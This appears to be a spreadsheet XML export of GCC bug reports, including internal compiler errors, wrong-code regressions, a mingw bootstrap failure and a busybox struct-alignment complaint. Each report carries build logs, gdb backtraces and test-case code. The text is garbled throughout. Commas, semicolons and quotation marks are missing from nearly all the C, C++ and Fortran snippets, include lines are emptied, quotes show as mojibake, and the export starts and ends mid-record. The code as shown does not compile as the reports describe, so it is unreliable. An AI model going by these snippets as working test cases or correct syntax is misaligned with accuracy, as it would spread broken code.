 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cc1plus -fpreprocessed tadt1.ii -D__GNUG__=2 -D__GXX_ABI_VERSION=100 -dumpbase tadt1.C -version -fnew-abi -o tadt1.s
GNU C++ version 2.97 20001127 (experimental) (i686-pc-linux-gnu) compiled by GNU C version 2.97 20001127 (experimental).
options passed:  -fpreprocessed -D__GNUG__=2 -D__GXX_ABI_VERSION=100
 -fnew-abi
options enabled:  -fpeephole -ffunction-cse -fkeep-static-consts
 -fpcc-struct-return -fsched-interblock -fsched-spec -fbranch-count-reg
 -fexceptions -fnew-exceptions -fcommon -fgnu-linker -fargument-alias
 -fident -fmath-errno -m80387 -mhard-float -mno-soft-float -mieee-fp
 -mfp-ret-in-387
 void g(A&amp;)
tadt1.C:13: parse error before template
tadt1.C:14: too many template parameter lists in declaration of `void h(A&amp; 
   int)'
 int main() int main() static int B::f()
tadt1.C:25: too many template parameter lists in declaration of `void h(A&amp; 
   int)'
tadt1.C:25: syntax error before '{' token
tadt1.C:27: `sizeof' applied to incomplete type `T'
tadt1.C:27: Internal error: Segmentation fault.
confused by earlier errors bailing out
preprocessor source: tadt1.ii
# 1 tadt1.C
template
class A
{}
template
class B {
public:
  static int f()
}
template
void g(A &amp;a)
template
void h(A 
int main()
{
}
template
int B::f(){}
template
void h(A &amp;a int d)
{
  void *b = 
  int c = sizeof(T)
}
Debugging cc1plus</t>
  </si>
  <si>
    <t>GCC-61889</t>
  </si>
  <si>
    <t>[5 Regression] gcov-tool.c uses nftw ftw.h</t>
  </si>
  <si>
    <t>Bootstrap fails:
g++ -c   -g  -DIN_GCC    -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wno-format -Wmissing-format-attribute -Woverloaded-virtual -pedantic -Wno-long-long -Wno-variadic-macr  os -Wno-overlength-strings   -DHAVE_CONFIG_H -I. -I. -I../../../../../../../opt/devel/gnu/src/gcc-mingw-w64/gcc-4.10.0/gcc -I../../../../../../../opt/devel/gnu/src/gcc-mingw-w64/gcc-4.10.0/gcc/. -I../../../../../../../opt/devel/gnu/src  /gcc-mingw-w64/gcc-4.10.0/gcc/../include -I./../intl -I../../../../../../../opt/devel/gnu/src/gcc-mingw-w64/gcc-4.10.0/gcc/../libcpp/include -I/opt/devel/SCRATCH/tmp.s61dWEwM1g/install/include -I/opt/devel/SCRATCH/tmp.s61dWEwM1g/instal  l/include -I/opt/devel/SCRATCH/tmp.s61dWEwM1g/install/include  -I../../../../../../../opt/devel/gnu/src/gcc-mingw-w64/gcc-4.10.0/gcc/../libdecnumber -I../../../../../../../opt/devel/gnu/src/gcc-mingw-w64/gcc-4.10.0/gcc/../libdecnumber/  bid -I../libdecnumber -I../../../../../../../opt/devel/gnu/src/gcc-mingw-w64/gcc-4.10.0/gcc/../libbacktrace -DCLOOG_INT_GMP -I/opt/devel/SCRATCH/tmp.s61dWEwM1g/install/include -I/opt/devel/SCRATCH/tmp.s61dWEwM1g/install/include  -o gco  v-tool.o -MT gcov-tool.o -MMD -MP -MF ./.deps/gcov-tool.TPo ../../../../../../../opt/devel/gnu/src/gcc-mingw-w64/gcc-4.10.0/gcc/gcov-tool.c
../../../../../../../opt/devel/gnu/src/gcc-mingw-w64/gcc-4.10.0/gcc/gcov-tool.c:38:17: fatal error: ftw.h: No such file or directory
 #include 
                 ^
compilation terminated.
Makefile:1063: recipe for target 'gcov-tool.o' failed
make: *** [gcov-tool.o] Error 1
This is not very portable and breaks bootstrap for mingw targets sine nearly two weeks.</t>
  </si>
  <si>
    <t>xur</t>
  </si>
  <si>
    <t>GCC-33275</t>
  </si>
  <si>
    <t>Transient libgomp.fortran/omp_parse3.f90 -O0  failure</t>
  </si>
  <si>
    <t>There is a transient failure of libgomp.fortran/omp_parse3.f90 at -O0 on
Linux/ia32. It aborts one of 3 tries. When it fails
(gdb) bt
#0  0x400007a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x401307a5 in raise () from /lib/tls/libc.so.6
#2  0x40132209 in abort () from /lib/tls/libc.so.6
#3  0x4009f0fc in _gfortran_abort ()
    at ../../../src/libgfortran/intrinsics/abort.c:39
#4  0x08048d1e in test_threadprivate.1061.omp_fn.2 (.omp_data_i=0xbfe2abc8)
    at /export/gnu/import/rrs/127951/src/libgomp/testsuite/libgomp.fortran/omp_parse3.f90:90
#5  0x4001c188 in gomp_thread_start (xdata=0xbfe2aad0)
    at ../../../src/libgomp/team.c:108
#6  0x400fc3cc in start_thread () from /lib/tls/libpthread.so.0
#7  0x401d1c3e in clone () from /lib/tls/libc.so.6
(gdb) f 4
#4  0x08048d1e in test_threadprivate.1061.omp_fn.2 (.omp_data_i=0xbfe2abc8)
    at /export/gnu/import/rrs/127951/src/libgomp/testsuite/libgomp.fortran/omp_parse3.f90:90
90            if (x .ne. j .or. y .ne. j + 1024) call abort
I am running 2.6.9-55.ELsmp on RHEL4 U5.</t>
  </si>
  <si>
    <t>GCC-37554</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with invalid cast</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.3.0:
========================
struct A {}
class B : A {}
void foo(B b)
{
  (A)b
}
========================
bug.cc: In function 'void foo(B)':
bug.cc:6: error: 'A' is an inaccessible base of 'B'
bug.cc:6: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in useless_type_conversion_p_1 at tree-ssa.c:1075
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-15396</t>
  </si>
  <si>
    <t>[3.4 only][sh-linux] ICE with -O2 -fPIC</t>
  </si>
  <si>
    <t>The attached code ICE's with '-m4 -O2 -fPIC'.
$ sh-linux-gcc -O2 -fPIC -m4 -c XExtInt.i
XExtInt.c: In function `XInputWireToEvent':
XExtInt.c:663: error: unrecognizable insn:
(insn 2736 2735 2737 (unspec_volatile [
            (label_ref 775)
            (const_int 0 [0x0])
        ] 4) -1 (nil)
    (nil))
XExtInt.c:663: internal compiler error: in insn_default_length at insn-
attrtab.c:709
It correctly compiles with '-m4 -O -fPIC'.</t>
  </si>
  <si>
    <t>sugioka</t>
  </si>
  <si>
    <t>GCC-10087</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] optimizer produces wrong code when indexing 2D array</t>
  </si>
  <si>
    <t xml:space="preserve">In the attached code a two-dimensional array of structs is malloc'ed
then the first field of that struct is initialized to 1 for all
array members. Finally the minimum value of all these fields is
determined by looping over the array again. This should of course
return 1 but the actual result is 1.039778e-312.
This code runs OK with gcc 3.2.2
Release:
3.3 20030310 (prerelease)
Environment:
System: SunOS scooby 5.9 Generic_112233-04 sun4u sparc SUNWSun-Blade-100
Architecture: sun4
host: sparc-sun-solaris2.9
build: sparc-sun-solaris2.9
target: sparc-sun-solaris2.9
configured with: /scratch/temp/ss/gcc-20030310/configure --prefix=/opt/local/gcc330
How-To-Repeat:
scooby&gt;	gcc -v -save-temps -O2 bug.c
Reading specs from /opt/local/gcc330/lib/gcc-lib/sparc-sun-solaris2.9/3.3/specs
Configured with: /scratch/temp/ss/gcc-20030310/configure --prefix=/opt/local/gcc330
Thread model: posix
gcc version 3.3 20030310 (prerelease)
 /opt/local/gcc330/lib/gcc-lib/sparc-sun-solaris2.9/3.3/cc1 -E -quiet -v -D__GNUC__=3 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=0 -Dsparc -D__sparc__ -D__sparc -D__GCC_NEW_VARARGS__ -Acpu=sparc -Amachine=sparc bug.c -O2 bug.i
ignoring nonexistent directory /opt/local/gcc330/sparc-sun-solaris2.9/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /opt/local/gcc330/include
 /opt/local/gcc330/lib/gcc-lib/sparc-sun-solaris2.9/3.3/include
 /usr/include
End of search list.
 /opt/local/gcc330/lib/gcc-lib/sparc-sun-solaris2.9/3.3/cc1 -fpreprocessed bug.i -quiet -dumpbase bug.c -auxbase bug -O2 -version -o bug.s
GNU C version 3.3 20030310 (prerelease) (sparc-sun-solaris2.9)
	compiled by GNU C version 3.3 20030310 (prerelease).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
 /usr/ccs/bin/as -V -Qy -s -o bug.o bug.s
/usr/ccs/bin/as: Sun WorkShop 6 update 2 Compiler Common 6.2 Solaris_9_CBE 2001/04/02
 /opt/local/gcc330/lib/gcc-lib/sparc-sun-solaris2.9/3.3/collect2 -V -Y P/usr/ccs/lib:/usr/lib -Qy /opt/local/gcc330/lib/gcc-lib/sparc-sun-solaris2.9/3.3/crt1.o /opt/local/gcc330/lib/gcc-lib/sparc-sun-solaris2.9/3.3/crti.o /usr/ccs/lib/values-Xa.o /opt/local/gcc330/lib/gcc-lib/sparc-sun-solaris2.9/3.3/crtbegin.o -L/opt/local/gcc330/lib/gcc-lib/sparc-sun-solaris2.9/3.3 -L/usr/ccs/bin -L/usr/ccs/lib -L/opt/local/gcc330/lib/gcc-lib/sparc-sun-solaris2.9/3.3/../../.. bug.o -lgcc -lgcc_eh -lc -lgcc -lgcc_eh -lc /opt/local/gcc330/lib/gcc-lib/sparc-sun-solaris2.9/3.3/crtend.o /opt/local/gcc330/lib/gcc-lib/sparc-sun-solaris2.9/3.3/crtn.o
ld: Software Generation Utilities - Solaris Link Editors: 5.9-1.373
scooby&gt;	a.out 
result 1.039778e-312
This is the input:
See attachments for bug.i.bz2
</t>
  </si>
  <si>
    <t>p.van-hoof</t>
  </si>
  <si>
    <t>GCC-34813</t>
  </si>
  <si>
    <t>ICE on incorrect nested type constructor (fold-const.c (fold_convert):2629)</t>
  </si>
  <si>
    <t>$&gt; cat ice.f90
MODULE kd_kd_tree_type
  TYPE :: kd_tree_node
    TYPE(kd_tree_node_private) POINTER :: p
  END TYPE
  TYPE :: kd_tree_node_private
    INTEGER :: dummy
  END TYPE
  TYPE :: kd_tree
    TYPE(kd_tree_node) :: root
  END TYPE
CONTAINS
  SUBROUTINE kd_tree_init_default(this)
    TYPE(kd_tree) INTENT(inout) :: this
!     this = kd_tree(kd_tree_node(null()))     ! correct
    this = kd_tree(null())                     ! ICE
  END SUBROUTINE
END MODULE
$&gt; gfortran-svn ice.f90
ice.f90: In function 'kd_tree_init_default':
ice.f90:15: internal compiler error: in fold_convert at fold-const.c:2629
Please submit a full bug report
$&gt; gfortran-svn -v
gcc version 4.3.0 20080107 (experimental)
Backtrace:
(gdb) bt
#0  fancy_abort (file=0x87f3ec4 ../../../svn/gcc/gcc/fold-const.c line=2629 function=0x87f8472 fold_convert)
    at ../../../svn/gcc/gcc/diagnostic.c:659
#1  0x0824efd1 in fold_convert (type=0xb7d0f548 arg=0xb7cd39d8) at ../../../svn/gcc/gcc/fold-const.c:2629
#2  0x080f378b in gfc_trans_subcomponent_assign (dest=0xb7cde078 cm=0x89ba8d0 expr=0x89bb1c8) at ../../../svn/gcc/gcc/fortran/trans-expr.c:3354
#3  0x080f396a in gfc_trans_structure_assign (dest=0xb7cdd108 expr=) at ../../../svn/gcc/gcc/fortran/trans-expr.c:3414
#4  0x080f3b8b in gfc_conv_structure (se=0xbfec283c expr=0x89bb760 init=0) at ../../../svn/gcc/gcc/fortran/trans-expr.c:3441
#5  0x080ef85c in gfc_conv_expr (se=0xbfec283c expr=0x89bb760) at ../../../svn/gcc/gcc/fortran/trans-expr.c:3563
#6  0x080f0ab0 in gfc_trans_assignment_1 (expr1=0x89bb100 expr2=0x89bb760 init_flag=0 '\0') at ../../../svn/gcc/gcc/fortran/trans-expr.c:4293
#7  0x080f0c4c in gfc_trans_assignment (expr1=0x89bb100 expr2=0x89bb760 init_flag=72 'H') at ../../../svn/gcc/gcc/fortran/trans-expr.c:4440
#8  0x080f17e1 in gfc_trans_assign (code=0x89bb7d0) at ../../../svn/gcc/gcc/fortran/trans-expr.c:4452
#9  0x080cfe90 in gfc_trans_code (code=0x89bb7d0) at ../../../svn/gcc/gcc/fortran/trans.c:994
#10 0x080e7cc2 in gfc_generate_function_code (ns=0x89ba920) at ../../../svn/gcc/gcc/fortran/trans-decl.c:3298
#11 0x080cd01a in gfc_generate_module_code (ns=0x89b9e20) at ../../../svn/gcc/gcc/fortran/trans.c:1214
#12 0x0809f219 in gfc_parse_file () at ../../../svn/gcc/gcc/fortran/parse.c:3391
#13 0x080c8985 in gfc_be_parse_file (set_yydebug=0) at ../../../svn/gcc/gcc/fortran/f95-lang.c:260
#14 0x0836c6d4 in toplev_main (argc=2 argv=0xbfec2ca4) at ../../../svn/gcc/gcc/toplev.c:1042
#15 0x08114b1f in main (argc=16 argv=0x0) at ../../../svn/gcc/gcc/main.c:35
This might be related to (or be a dupe of) PR33295.</t>
  </si>
  <si>
    <t>GCC-30004</t>
  </si>
  <si>
    <t>overzealous alignment of structure - 32 bytes (not bits!)</t>
  </si>
  <si>
    <t>Hello. I am a maintainer of busybox project. One of our goals is to optimize our code for size. The following testcase was derived from busybox source:
struct client_config_t {
        char foreground
        char quit_after_lease
        char release_on_quit
        char abort_if_no_lease
        char *interface
        char *script
        char *clientid
        char *fqdn
        int retries
        int timeout
        char arp[6]
}
struct client_config_t udhcp_client_config1
struct client_config_t client_config2 = {
        /* Default options. */
        .abort_if_no_lease = 0
        .foreground = 0
        .quit_after_lease = 0
        .release_on_quit = 0
        .interface = eth0
        .script = /share/udhcpc/default.script
        .clientid = 0
        .fqdn = 0
        .retries = 3
        .timeout = 3
        .arp = \0\0\0\0\0\0          /* appease gcc-3.0 */
}
int udhcpc_main(int argc char *argv[])
{
        udhcp_client_config1.interface = eth0
        udhcp_client_config1.script = /share/udhcpc/default.script
        udhcp_client_config1.retries = udhcp_client_config1.timeout = 3
        return 0
}
Even when compiled with optimisation for size (gcc -Os -S -fomit-frame-pointer dhcpc.c) both data- and bss-placed structures are aligned to 32 _bytes_.
The structs are itself only _36 bytes_ large! When a lot of structures from different .o modules are combined into final executable we waste a lot of space (on average 15.5 bytes per structure):
        .file   dhcpc.c
        .section        .rodata.str1.1aMS@progbits1
.LC0:
        .string eth0
.LC1:
        .string /share/udhcpc/default.script
        .text
.globl udhcpc_main
        .type   udhcpc_main @function
udhcpc_main:
        movl    $.LC0 udhcp_client_config1+4
        movl    $.LC1 udhcp_client_config1+8
        movl    $3 udhcp_client_config1+24
        movl    $3 udhcp_client_config1+20
        xorl    %eax %eax
        ret
        .size   udhcpc_main .-udhcpc_main
.globl client_config2
        .data
        .align 32    &lt;---------------------HERE
        .type   client_config2 @object
        .size   client_config2 36
client_config2:
        .byte   0
        .byte   0
        .byte   0
        .byte   0
        .long   .LC0
        .long   .LC1
        .long   0
        .long   0
        .long   3
        .long   3
        .string 
        .string 
        .string 
        .string 
        .string 
        .string 
        .zero   2
        .comm   udhcp_client_config13632  &lt;---- HERE
        .ident  GCC: (GNU) 4.1.1
        .section        .note.GNU-stack@progbits
Is it possible to instruct gcc to use smaller alignment?
BTW is there any progress on bug 22158 (also related to data alignment)? I have a patch there...</t>
  </si>
  <si>
    <t>vda.linux</t>
  </si>
  <si>
    <t>GCC-6137</t>
  </si>
  <si>
    <t>ia64 -O3 generates bad overlapping memory accesses</t>
  </si>
  <si>
    <t>The code generated for this test case with -O3 on ia64
interleaves two memory copies causing some of the values
on the stack to be loaded before they are first stored to.
This happens in the following function for which copies
of 4 8-byte values from r12+64 to r12+16 are interleaved
with copies from the second argument to r12+64:
  void test_T2a(Tensor1 &amp;t1_1
                Tensor2 &amp;t2_1)
  {
    Index i
    t1_1(i)=t2_1(i0)
    dump2(t1_1t2_1)
  }
This happens with GCC 3.0.4 as well.
The test case is taken from the FTensor package which is
covered by the GPL.
Release:
gcc version 3.1 20020402 (prerelease)
Environment:
Itanium Red Hat Linux release 7.2 (Enigma
How-To-Repeat:
Compile the attached test case with
-w -ftemplate-depth-100 -Drestrict= -DFTENSOR_DEBUG -O3.
When run it should print 10 10.  Examine the generated
code for function test_T2a.</t>
  </si>
  <si>
    <t>GCC-5379</t>
  </si>
  <si>
    <t>[i386] internal error: Segmentation fault (prefetch related?)</t>
  </si>
  <si>
    <t># gcc -c x.c -fprefetch-loop-arrays -march=athlon -O2
x.c: In function `_KDE_IceGetPoValidAuthIndices':
x.c:33: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 3.1 20020114 (experimental)
Environment:
Linux 2.4.16 Athlon
How-To-Repeat:
Compile the attached file with
gcc -c x.c -fprefetch-loop-arrays -march=athlon -O2</t>
  </si>
  <si>
    <t>ritzert</t>
  </si>
  <si>
    <t>GCC-44640</t>
  </si>
  <si>
    <t>spu port fails to build with --enable-build-with-cxx</t>
  </si>
  <si>
    <t>Even with the patch for 44512 installed a build fails due to problems in
the spu port e.g.:
../../gcc/gcc/config/spu/spu.c:294: error: invalid conversion from â€˜tree_node* (*)(tree_node** tree_node* tree_node* int unsigned char*)â€™ to â€˜tree_node* (*)(tree_node** tree_node* tree_node* int bool*)â€™
../../gcc/gcc/config/spu/spu.c:294: error: invalid conversion from â€˜tree_node* (*)(tree_node** tree_node* tree_node* int unsigned char*)â€™ to â€˜tree_node* (*)(tree_node** tree_node* tree_node* int bool*)â€™
../../gcc/gcc/config/spu/spu.c:468: error: invalid conversion from â€˜unsigned char (*)(tree_node* tree_node*)â€™ to â€˜bool (*)(tree_node* tree_node*)â€™
../../gcc/gcc/config/spu/spu.c:468: error: invalid conversion from â€˜unsigned char (*)(machine_mode)â€™ to â€˜bool (*)(machine_mode)â€™
../../gcc/gcc/config/spu/spu.c:468: error: invalid conversion from â€˜unsigned char (*)(machine_mode)â€™ to â€˜bool (*)(machine_mode)â€™
../../gcc/gcc/config/spu/spu.c:468: error: invalid conversion from â€˜unsigned char (*)(rtx_def* int int int* bool)â€™ to â€˜bool (*)(rtx_def* int int int* bool)â€™
../../gcc/gcc/config/spu/spu.c:468: error: invalid conversion from â€˜unsigned char (*)(int* machine_mode const tree_node* unsigned char)â€™ to â€˜bool (*)(int* machine_mode const tree_node* bool)â€™
../../gcc/gcc/config/spu/spu.c: In function â€˜bool spu_scalar_mode_supported_p(machine_mode)â€™:
../../gcc/gcc/config/spu/spu.c:549: error: new declaration â€˜bool spu_scalar_mode_supported_p(machine_mode)â€™
../../gcc/gcc/config/spu/spu.c:153: error: ambiguates old declaration â€˜unsigned char spu_scalar_mode_supported_p(machine_mode)â€™
../../gcc/gcc/config/spu/spu.c: In function â€˜bool spu_vector_mode_supported_p(machine_mode)â€™:
../../gcc/gcc/config/spu/spu.c:571: error: new declaration â€˜bool spu_vector_mode_supported_p(machine_mode)â€™
../../gcc/gcc/config/spu/spu.c:154: error: ambiguates old declaration â€˜unsigned char spu_vector_mode_supported_p(machine_mode)â€™
../../gcc/gcc/config/spu/spu.c: In function â€˜tree_node* spu_handle_fndecl_attribute(tree_node** tree_node* tree_node* int bool*)â€™:
../../gcc/gcc/config/spu/spu.c:3851: warning: unknown conversion type character â€˜Eâ€™ in format
../../gcc/gcc/config/spu/spu.c:3851: warning: too many arguments for format
../../gcc/gcc/config/spu/spu.c: In function â€˜tree_node* spu_handle_vector_attribute(tree_node** tree_node* tree_node* int bool*)â€™:
../../gcc/gcc/config/spu/spu.c:3908: warning: unknown conversion type character â€˜Eâ€™ in format
../../gcc/gcc/config/spu/spu.c:3908: warning: too many arguments for format
../../gcc/gcc/config/spu/spu.c: In function â€˜void ea_load_store_inline(rtx_def* bool rtx_def* rtx_def*)â€™:
../../gcc/gcc/config/spu/spu.c:4492: error: cannot convert â€˜reg_noteâ€™ to â€˜machine_modeâ€™ for argument â€˜2â€™ to â€˜rtx_def* gen_rtx_fmt_ee_stat(rtx_code machine_mode rtx_def* rtx_def*)â€™
../../gcc/gcc/config/spu/spu.c: In function â€˜bool spu_rtx_costs(rtx_def* int int int* bool)â€™:
../../gcc/gcc/config/spu/spu.c:5359: error: new declaration â€˜bool spu_rtx_costs(rtx_def* int int int* bool)â€™
../../gcc/gcc/config/spu/spu.c:199: error: ambiguates old declaration â€˜unsigned char spu_rtx_costs(rtx_def* int int int* bool)â€™
../../gcc/gcc/config/spu/spu.c: In function â€˜bool spu_function_ok_for_sibcall(tree_node* tree_node*)â€™:
../../gcc/gcc/config/spu/spu.c:5482: error: new declaration â€˜bool spu_function_ok_for_sibcall(tree_node* tree_node*)â€™
../../gcc/gcc/config/spu/spu.c:201: error: ambiguates old declaration â€˜unsigned char spu_function_ok_for_sibcall(tree_node* tree_node*)â€™
../../gcc/gcc/config/spu/spu.c: At global scope:
../../gcc/gcc/config/spu/spu.c:7086: warning: unused parameter â€˜labelnoâ€™
In file included from ../../gcc/gcc/config/spu/spu.c:7092:
../../gcc/gcc/config/spu/spu.c:153: warning: â€˜unsigned char spu_scalar_mode_supported_p(machine_mode)â€™ declared â€˜staticâ€™ but never defined
../../gcc/gcc/config/spu/spu.c:154: warning: â€˜unsigned char spu_vector_mode_supported_p(machine_mode)â€™ declared â€˜staticâ€™ but never defined
../../gcc/gcc/config/spu/spu.c:181: warning: â€˜tree_node* spu_handle_fndecl_attribute(tree_node** tree_node* tree_node* int unsigned char*)â€™ declared â€˜staticâ€™ but never defined
../../gcc/gcc/config/spu/spu.c:184: warning: â€˜tree_node* spu_handle_vector_attribute(tree_node** tree_node* tree_node* int unsigned char*)â€™ declared â€˜staticâ€™ but never defined
../../gcc/gcc/config/spu/spu.c:188: warning: â€˜unsigned char spu_pass_by_reference(int* machine_mode const tree_node* unsigned char)â€™ declared â€˜staticâ€™ but never defined
../../gcc/gcc/config/spu/spu.c:199: warning: â€˜unsigned char spu_rtx_costs(rtx_def* int int int* bool)â€™ declared â€˜staticâ€™ but never defined
../../gcc/gcc/config/spu/spu.c:201: warning: â€˜unsigned char spu_function_ok_for_sibcall(tree_node* tree_node*)â€™ declared â€˜staticâ€™ but never defined
../../gcc/gcc/config/spu/spu.c:3843: warning: â€˜tree_node* spu_handle_fndecl_attribute(tree_node** tree_node* tree_node* int bool*)â€™ defined but not used
../../gcc/gcc/config/spu/spu.c:3860: warning: â€˜tree_node* spu_handle_vector_attribute(tree_node** tree_node* tree_node* int bool*)â€™ defined but not used
I have a patch set for it but it got lumped in a 642817 byte patch.  I'll be
working on extracting the actually necessary parts.</t>
  </si>
  <si>
    <t>GCC-24679</t>
  </si>
  <si>
    <t>The following on screen description happened:
jacin04 PHITS/src&gt; gcc -v -save-temps -O4 -c mars00.f
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.0.1/configure --prefix=/usr/common/usg/gcc/4.0.1 --with-mpfr-dir=/usr/common/usg/gmp/src/gmp-4.1.4/mpfr/ --with-mpfr=/usr/common/usg/gmp/4.1.4/lib --with-gmp=/usr/common/usg/gmp/4.1.4 --with-gmp_dir=/usr/common/usg/gmp/src/gmp-4.1.4 --disable-multilib
Thread model: posix
gcc version 4.0.1
 /usr/common/usg/gcc/4.0.1/libexec/gcc/x86_64-unknown-linux-gnu/4.0.1/f951 mars00.f -ffixed-form -quiet -dumpbase mars00.f -mtune=k8 -auxbase mars00 -O4 -version -o mars00.s
GNU F95 version 4.0.1 (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.0.1.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=65536
 In file mars00.f:838
         if (iii-2) 570510540                                         
                                                                       1
Warning: Obsolete: arithmetic IF statement at (1)
mars00.f: In function 'fidas':
mars00.f:927: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The subroutine that generated the error is as follows:
      subroutine fidas (dldlldll2j3n5n6)
      external fidcom
c
c   *** data array modification
c#######################################################################
c
c                audit trail information
c
c     date the module was last permanently updated:     93/09/20
c     time the module was last permanently updated:     07:31:12
c     programmer name:                                  l.m.petrie
c     module name:                                      s7fidas
c     current archiving level number:                   00020
c     current number of permanent updates:              00020
c     date of last access by librarian:                 93/09/20
c     dataset name:  x4s.scale4.master
c
c#######################################################################
      dimension in(37)k(37)v(37)ld(*)vmt(18)w(12)
     *          d(*)lld(*)
      common /fidasc/ iprtrg
      dimension prt(3)
      equivalence (bblbb)
      dimension vs(74)
      equivalence (v(1)vs(1))
      double precision vvvvudeldeltdif
      character*1 klbbldllslr1liltlsslflalaplpllmilzlvlu
      character*1 bblqlmlnlellilkilolclslsldblhllb
      character*4 prtvmt
      dimension dv(2)vi(2)
      equivalence (dv(1)delt)(vi(1)vv)
      data ldllslr1liltlss/'$''*''r''i''t''s'/
      data lflalaplpllmi/'f''a''&amp;''+''-'/
      data lzlvlubb/'z''v''u'' '/
      data lqlmln/'q''m''n'/le/'e'/lli/'l'/
      data lki/'k'/
      data lolcprt(1)prt(2)prt(3)/'o''c''off ''prt ''on  '/
      data lsls /'/'/
      data ldb/'#'/ lhl/'h'/
      kdbl   = 0
      ldbl   = 0
      j      = 0
      j3     = 0
      iii    = 0
      ivmt   = 0
      ncount = 0
  100 call ffread(inkvnfn5n6iprtrg)
      do 120 i=1nf
         if (k(i).ne.lpl.and.k(i).ne.lap.and.k(i).ne.lmi) go to 120
c   *** exponentiation (&amp;+-)
         l      = in(i)
         if (l.eq.0) go to 120
         e      = 10.0**l
         if (k(i).eq.lmi) go to 110
         v(i)   = v(i)*e
         go to 120
  110    v(i)   = v(i)/e
  120    continue
      i      = 1
  130 continue
         if (iii.eq.0)                 go to 140
         if (iii-2) 570510540
  140    iii    = 0
         if (k(i).eq.lbb)              go to 370
         if (k(i).eq.lhl)              go to 370
         if (k(i).eq.ldl)              go to 200
         if (k(i).eq.ls)               go to 190
         if (k(i).eq.ldb)              go to 180
         if (k(i).eq.lr1)              go to 400
         if (k(i).eq.li)               go to 560
         if (k(i).eq.lt)               go to 150
         if (k(i).eq.lss)              go to 340
         if (k(i).eq.lf)               go to 290
         if (k(i).eq.la)               go to 330
         if (k(i).eq.lz)               go to 390
         if (k(i).eq.le)               go to 320
         if (k(i).eq.lq)               go to 420
         if (k(i).eq.lm.or.k(i).eq.ln) go to 460
         if (k(i).eq.lu)               go to 160
         if (k(i).eq.lv)               go to 170
         if (k(i).eq.lli)              go to 500
         if (k(i).eq.lki)              go to 530
         if (k(i).eq.lo)               go to 350
         if (k(i).eq.lc)               go to 360
         if (k(i).eq.lsls)             go to 210
         go to 370
c   *** terminate (t)
  150    j2     = 0
         itest  = in(i)
         kdbl   = ldbl
         if (j.eq.0) go to 250
         go to 220
c   *** variable format control (uv)
  160    read(n510900)vmt
  170    ivmt   = 1
         go to 190
c    *** begin new array (*$#)
  180    kdbl   = ldbl
cshr
         ldbl   = 1
cshr
clng
c        ldbl   = 0
clng
         kkk    = 0
         go to 210
  190    kkk    = 0
         kdbl   = ldbl
         ldbl   = 0
         go to 210
  200    kkk    = 1
         kdbl   = ldbl
         ldbl   = 0
  210    if (ncount+j.eq.0) go to 270
         j2     = 1
  220    ij     = j
         ic     = ncount
         inc    = 1
         if (kdbl.eq.0) go to 230
         ij     = j/2
         ic     = ncount/2
         inc    = 2
  230    write(n610400) lllbij
         if (j.eq.ncount) go to 250
         imax   = j1 + j - 1
         if (j.gt.10000) imax   = j + 99
         if (kk.eq.1) then
           write(n6'(1x10i12)')      (ld(ii)ii=j1imaxinc)
         else
           write(n6'(1x1p10e12.5)') (d(ii)ii=j1imaxinc)
         end if
         j3     = j3 + 1
         write(n610500) iclllb
  250    if (j2.ne.0) go to 270
         write(n610600)in(i)lt
  260    return
  270    if (k(i).eq.lsls) go to 590
         ll     = in(i)
         ll3    = ll + ll2 - 1
         kk     = kkk
         lb     = k(i)
         inc    = ldbl+1
         j      = inc*v(i)
         j1     = lld(ll3) + j
         ncount = lld(ll3+ 1) - j1
         j      = 0
         if (ivmt.eq.0) go to 600
c   *** variable format control (uv)
  280    if (ncount.eq.0) go to 100
         j      = ncount
         ncc    = j1 + ncount - 1
         read(n5vmt) (d(j2)j2=j1ncc)
         ivmt   = 0
         go to 100
c   *** fill array (f)
  290    if (j.ge.ncount) go to 310
         ncc    = j+1
         do 300 ii=nccncountinc
            j2     = j1 + ii -1
            if (ldbl.eq.1) then
              d(j2)   = vs(2*i-1)
              d(j2+1) = vs(2*i)
            else
              d(j2)   = v(i)
            end if
            if (kk.ne.0)  ld(j2) = v(i)
  300       continue
         j      = ncount
         go to 600
  310    write(n610700) lllb
         go to 600
c   *** end array (e)
  320    if (j.le.ncount) j=ncount
         go to 600
c   *** address modification (a)
  330    j      = v(i)
         if (j.gt.ncount.or.j.le.0) write(n610800)jlllb
         j      = inc*(j-1)
         go to 600
c   *** skip (s)
  340    j      = j + inc*in(i)
         go to 600
c   *** turn print trigger on/off
  350    iprtrg = -iprtrg
         write(n610100)prt(2)prt(iprtrg+2)in(i)lo
         go to 600
c   *** print count in current array
  360    write(n610200)lllbjin(i)lc
         go to 600
c   *** no modification
  370    continue
  380    j2     = j1 + j
         j      = j+inc
         if (ldbl.eq.1) then
           d(j2)   = vs(2*i-1)
           d(j2+1) = vs(2*i)
         else
           if (k(i).eq.lhl) then
             d(j2)   = vs(2*i-1)
             go to 600
           else
             d(j2)   = v(i)
           end if
         end if
         if (kk.ne.0) ld(j2) = v(i)
         go to 600
c   *** zero (z)
  390    in(i)  = v(i) + in(i)
         v(i)   = 0.0
c   *** repeat (r)
  400    l      = in(i)
cst      do 410 ii=1max(1l)
         do 410 ii=1max0(1l)
            j2     = j1 + j
            if (ldbl.eq.1) then
              d(j2)   = vs(2*i-1)
              d(j2+1) = vs(2*i)
            else
              d(j2)   = v(i)
            end if
            if (kk.ne.0)  ld(j2) = v(i)
  410       j      = j+inc
         go to 600
c   *** sequence repeat (q)
  420    l      = v(i) + in(i)
         lseq   = 1
         if (v(i).eq.0.0.or.in(i).eq.0) go to 430
         l      = v(i)
